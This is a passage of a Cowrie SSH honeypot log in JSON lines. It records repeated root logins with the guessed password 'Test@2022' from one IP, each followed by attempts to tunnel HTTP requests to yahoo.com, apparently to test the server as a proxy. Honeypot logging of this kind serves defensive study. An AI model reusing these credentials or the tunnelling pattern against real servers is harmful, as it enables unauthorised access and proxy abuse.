fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:27.875894Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.110171Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"213.209.150.239","src_port":2966,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:2966","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.158202Z","session":"82e5922e26e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.205570Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":23514,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:23514","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.341448Z","session":"82e5922e26e5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.388485Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.436277Z","src_ip":"213.209.150.239","session":"82e5922e26e5"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64318,"dst_ip":"1.2.3.4","dst_port":22,"session":"943b48c47fd7","protocol":"ssh","message":"New connection: 213.209.150.239:64318 (1.2.3.4:22) [session: 943b48c47fd7]","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.491847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.501894Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.551002Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.832758Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":26566,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:26566","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.890608Z","session":"943b48c47fd7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:28.947326Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":3388,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:3388","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.102886Z","session":"943b48c47fd7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.159459Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.216733Z","src_ip":"213.209.150.239","session":"943b48c47fd7"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64362,"dst_ip":"1.2.3.4","dst_port":22,"session":"71182139d6dc","protocol":"ssh","message":"New connection: 213.209.150.239:64362 (1.2.3.4:22) [session: 71182139d6dc]","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.272256Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.273145Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.329869Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.611268Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":17003,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:17003","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.668627Z","session":"71182139d6dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.725325Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":16835,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:16835","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.878840Z","session":"71182139d6dc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.935263Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:29.992416Z","src_ip":"213.209.150.239","session":"71182139d6dc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64413,"dst_ip":"1.2.3.4","dst_port":22,"session":"52e31203deee","protocol":"ssh","message":"New connection: 213.209.150.239:64413 (1.2.3.4:22) [session: 52e31203deee]","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.038781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.039688Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.086905Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.322690Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":25266,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:25266","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.370633Z","session":"52e31203deee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.417833Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":27939,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:27939","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.553546Z","session":"52e31203deee"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.600695Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.649532Z","src_ip":"213.209.150.239","session":"52e31203deee"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64467,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ce411400b91","protocol":"ssh","message":"New connection: 213.209.150.239:64467 (1.2.3.4:22) [session: 8ce411400b91]","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.705160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.705923Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:30.763181Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.045530Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"213.209.150.239","src_port":26131,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:26131","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.103258Z","session":"8ce411400b91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.159985Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":1470,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:1470","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.315023Z","session":"8ce411400b91"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.371889Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.429183Z","src_ip":"213.209.150.239","session":"8ce411400b91"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":64512,"dst_ip":"1.2.3.4","dst_port":22,"session":"12a5749c4dc5","protocol":"ssh","message":"New connection: 213.209.150.239:64512 (1.2.3.4:22) [session: 12a5749c4dc5]","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.484701Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.485430Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.542165Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.824263Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":19497,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:19497","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.882788Z","session":"12a5749c4dc5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34590,"dst_ip":"1.2.3.4","dst_port":22,"session":"86aef0b0527f","protocol":"ssh","message":"New connection: 212.227.235.229:34590 (1.2.3.4:22) [session: 86aef0b0527f]","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.928647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.930626Z","src_ip":"212.227.235.229","session":"86aef0b0527f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:31.939427Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":3866,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:3866","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.094984Z","session":"12a5749c4dc5"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T00:58:32.153488Z","src_ip":"213.209.150.239","session":"12a5749c4dc5"}
